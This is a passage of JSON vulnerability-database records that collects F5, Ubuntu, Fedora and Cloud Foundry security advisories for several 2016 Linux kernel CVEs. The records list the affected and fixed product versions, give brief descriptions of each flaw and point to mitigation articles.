"F5:K37046163", "type": "f5", "title": "Kernel vulnerability CVE-2016-6480", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-6828"], "description": "\nF5 Product Development has assigned IDs 633655, 633656, and 624722 (BIG-IP), ID 633602 (BIG-IQ), ID 634365 (Enterprise Manager), and ID 634431 (F5 iWorkflow) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H635143 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium \n\n \n\n| Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 6.0.0 - 6.1.0 \n5.0.0 - 5.4.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to only trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 15.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2020-03-24T09:43:00", "published": "2016-12-21T03:38:00", "id": "F5:K62442245", "href": "https://support.f5.com/csp/article/K62442245", "title": "Kernel vulnerability CVE-2016-6828", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T22:23:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-6136"], "description": "\nF5 Product Development has assigned IDs 648879 and 653065 (BIG-IP), ID 652525 (BIG-IQ), ID 652524 (Enterprise Manager), and ID 456789 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H90803619 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.3.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Medium | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "edition": 1, "modified": "2018-06-06T21:22:00", "published": "2017-03-28T07:36:00", "id": "F5:K90803619", "href": "https://support.f5.com/csp/article/K90803619", "title": "Linux kernel vulnerability CVE-2016-6136", "type": "f5", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-02-20T21:07:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "\nF5 Product Development has assigned ID 610107 (BIG-IP), ID 461496 (ARX), and INSTALLER-2561 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP AAM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP AFM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP Analytics| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1| Medium| Linux kernel \nBIG-IP APM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP ASM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP DNS| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2| Medium| Linux kernel \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP PEM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.6.0 - 11.6.1| Medium| Linux kernel \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information for the BIG-IP system, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-03-14T00:54:00", "published": "2016-08-26T20:35:00", "id": "F5:K46514822", "href": "https://support.f5.com/csp/article/K46514822", "title": "Linux TCP stack vulnerability CVE-2016-5696", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-10T21:24:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information for the BIG-IP system, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-11-10T00:00:00", "published": "2016-08-26T00:00:00", "id": "SOL46514822", "href": "http://support.f5.com/kb/en-us/solutions/public/k/46/sol46514822.html", "type": "f5", "title": "SOL46514822 - Linux TCP stack vulnerability CVE-2016-5696", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3097-1", "href": "https://ubuntu.com/security/notices/USN-3097-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-13T00:00:00", "published": "2016-10-13T00:00:00", "id": "USN-3097-2", "href": "https://ubuntu.com/security/notices/USN-3097-2", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:44:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3098-1", "href": "https://ubuntu.com/security/notices/USN-3098-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 68, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3098-2", "href": "https://ubuntu.com/security/notices/USN-3098-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-3", "href": "https://ubuntu.com/security/notices/USN-3099-3", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:41:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-2", "href": "https://ubuntu.com/security/notices/USN-3099-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:44:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-4", "href": "https://ubuntu.com/security/notices/USN-3099-4", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039", "CVE-2016-6130"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the s390 SCLP console driver \nfor the Linux kernel when handling ioctl()s. A local attacker could use \nthis to obtain sensitive information from kernel memory. (CVE-2016-6130)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-1", "href": "https://ubuntu.com/security/notices/USN-3099-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The kernel meta package ", "modified": "2016-09-02T20:55:31", "published": "2016-09-02T20:55:31", "id": "FEDORA:6675C6051CCF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.2-201.fc24", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The kernel meta package ", "modified": "2016-09-02T23:22:48", "published": "2016-09-02T23:22:48", "id": "FEDORA:EF73760748F5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.7.2-101.fc23", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:42", "bulletinFamily": "software", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "USN-3099-2 Linux kernel vulnerabilities\n\n# \n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS\n\n# 